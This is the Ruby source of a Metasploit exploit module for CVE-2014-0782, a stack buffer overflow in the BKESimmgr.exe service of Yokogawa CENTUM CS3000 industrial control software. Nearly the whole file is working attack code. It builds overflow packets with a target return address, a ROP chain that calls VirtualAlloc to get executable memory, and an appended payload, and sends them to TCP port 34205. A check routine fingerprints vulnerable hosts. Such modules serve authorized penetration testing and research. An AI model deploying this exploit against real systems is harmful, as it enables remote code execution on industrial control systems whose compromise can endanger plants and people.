Path: blob/master/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb
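##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2014-0782: a stack-based buffer overflow in the
# BKESimmgr.exe service of Yokogawa CENTUM CS3000 (tested on R3.08.50).
#
# Protocol shape used by every packet this module builds (see create_pkt):
# a 4-byte big-endian operation identifier, a 2-byte big-endian length, and
# the body. The service trusts that attacker-supplied length as the memcpy
# size count, which is the root cause described in the module metadata.
# Traffic goes to TCP/34205 by default (RPORT).
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata (name, references, payload constraints,
  # the single supported target) and the RPORT option.
  #
  # @param info [Hash] framework-supplied module info, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Yokogawa CS3000 BKESimmgr.exe Buffer Overflow',
        'Description' => %q{
          This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability
          exists in the BKESimmgr.exe service when handling specially crafted packets, due to an
          insecure usage of memcpy, using attacker controlled data as the size count. This module
          has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows
          2003 SP2.
        },
        'Author' => [
          'juan vazquez',
          'Redsadic <julian.vilas[at]gmail.com>'
        ],
        'References' => [
          ['CVE', '2014-0782'],
          ['URL', 'https://www.rapid7.com/blog/post/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities'],
          ['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf']
        ],
        'Payload' => {
          'Space' => 340,
          'DisableNops' => true,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]',
            {
              'Ret' => 0x61d1274f, # 0x61d1274f # ADD ESP,10 # RETN # libbkebatchepa.dll
              'Offset' => 64,
              'FakeArgument1' => 0x0040E65C, # ptr to .data on BKESimmgr.exe
              'FakeArgument2' => 0x0040EB90 # ptr to .data on BKESimmgr.exe
            }
          ],
        ],
        'DisclosureDate' => '2014-03-10',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # BKESimmgr.exe listens on TCP/34205 by default.
    register_options(
      [
        Opt::RPORT(34205)
      ]
    )
  end

  # Fingerprints the service with a harmless 4-byte random body.
  #
  # A vulnerable build answers with a 10-byte reply that parse_response
  # decodes to (1, 4, 5). No reply (or a reply of another size) means we
  # could not reach or identify the service, so Unknown is reported rather
  # than Safe; a well-formed reply that does not match is reported as Safe.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    res = send_pkt(create_pkt(rand_text_alpha(4)))

    # No (or short) answer: cannot tell, do not claim the host is safe.
    return Exploit::CheckCode::Unknown unless res && res.length == 10

    return Exploit::CheckCode::Safe unless valid_response?(parse_response(res))

    Exploit::CheckCode::Appears
  end

  # Builds the overflow body, wraps it in the protocol header and sends it.
  #
  # Layout of the body: Offset bytes of filler, the target return address,
  # the two fake arguments, 16 bytes of padding, the ROP chain and finally
  # the encoded payload. The socket is always released, even if the write
  # raises.
  def exploit
    bof = rand_text(target['Offset'])
    bof << [target.ret].pack('V')
    bof << [target['FakeArgument1']].pack('V')
    bof << [target['FakeArgument2']].pack('V')
    bof << rand_text(16) # padding (corrupted bytes)
    bof << create_rop_chain
    bof << payload.encoded

    data = [0x1].pack('N') # Sub-operation id, <= 0x8 in order to pass the check at sub_4090B0
    data << [bof.length].pack('n')
    data << bof

    pkt = create_pkt(data)

    print_status("Trying target #{target.name}, sending #{pkt.length} bytes...")
    connect
    begin
      sock.put(pkt)
    ensure
      disconnect
    end
  end

  # Returns the packed ROP chain (little-endian 32-bit gadget addresses).
  #
  # @return [String] binary string ready to be appended to the overflow body
  def create_rop_chain
    # rop chain generated with mona.py - www.corelan.be
    [
      0x004047ca, # POP ECX # RETN [BKESimmgr.exe]
      0x610e3024, # ptr to &VirtualAlloc() [IAT libbkfmtvrecinfo.dll]
      0x61232d60, # MOV EAX,DWORD PTR DS:[ECX] # RETN [LibBKESysVWinList.dll]
      0x61d19e6a, # XCHG EAX,ESI # RETN [libbkebatchepa.dll]
      0x619436d3, # POP EBP # RETN [libbkeeda.dll]
      0x61615424, # & push esp # ret [libbkeldc.dll]
      0x61e56c8e, # POP EBX # RETN [LibBKCCommon.dll]
      0x00000001, # 0x00000001-> ebx
      0x61910021, # POP EDX # ADD AL,0 # MOV EAX,6191002A # RETN [libbkeeda.dll]
      0x00001000, # 0x00001000-> edx
      0x0040765a, # POP ECX # RETN [BKESimmgr.exe]
      0x00000040, # 0x00000040-> ecx
      0x6191aaab, # POP EDI # RETN [libbkeeda.dll]
      0x61e58e04, # RETN (ROP NOP) [LibBKCCommon.dll]
      0x00405ffa, # POP EAX # RETN [BKESimmgr.exe]
      0x90909090, # nop
      0x619532eb # PUSHAD # RETN [libbkeeda.dll]
    ].pack('V*')
  end

  # Wraps +data+ in the service's packet header.
  #
  # @param data [String] packet body
  # @return [String] 4-byte operation id (1), 2-byte big-endian body length, body
  def create_pkt(data)
    pkt = [0x01].pack('N') # Operation Identifier
    pkt << [data.length].pack('n') # length
    pkt << data # Fake packet

    pkt
  end

  # Sends one packet and reads a single response chunk.
  #
  # The connection is closed in an +ensure+ block so a failed write or read
  # cannot leak the socket.
  #
  # @param data [String] complete packet, as built by create_pkt
  # @return [String, nil] whatever sock.get_once returned (nil on no data)
  def send_pkt(data)
    connect
    begin
      sock.put(data)
      sock.get_once
    ensure
      disconnect
    end
  end

  # Decodes a 10-byte reply into its three header fields.
  #
  # @param data [String] raw response bytes
  # @return [Array] [32-bit BE, 16-bit BE, 32-bit BE] (nil entries if short)
  def parse_response(data)
    data.unpack('NnN')
  end

  # True when the decoded reply is the (1, 4, 5) triple a vulnerable
  # BKESimmgr.exe returns. The original duplicated the middle comparison;
  # each field is now tested once.
  #
  # @param data [Array, nil] output of parse_response
  # @return [Boolean]
  def valid_response?(data)
    return false unless data

    data[0] == 1 && data[1] == 4 && data[2] == 5
  end
end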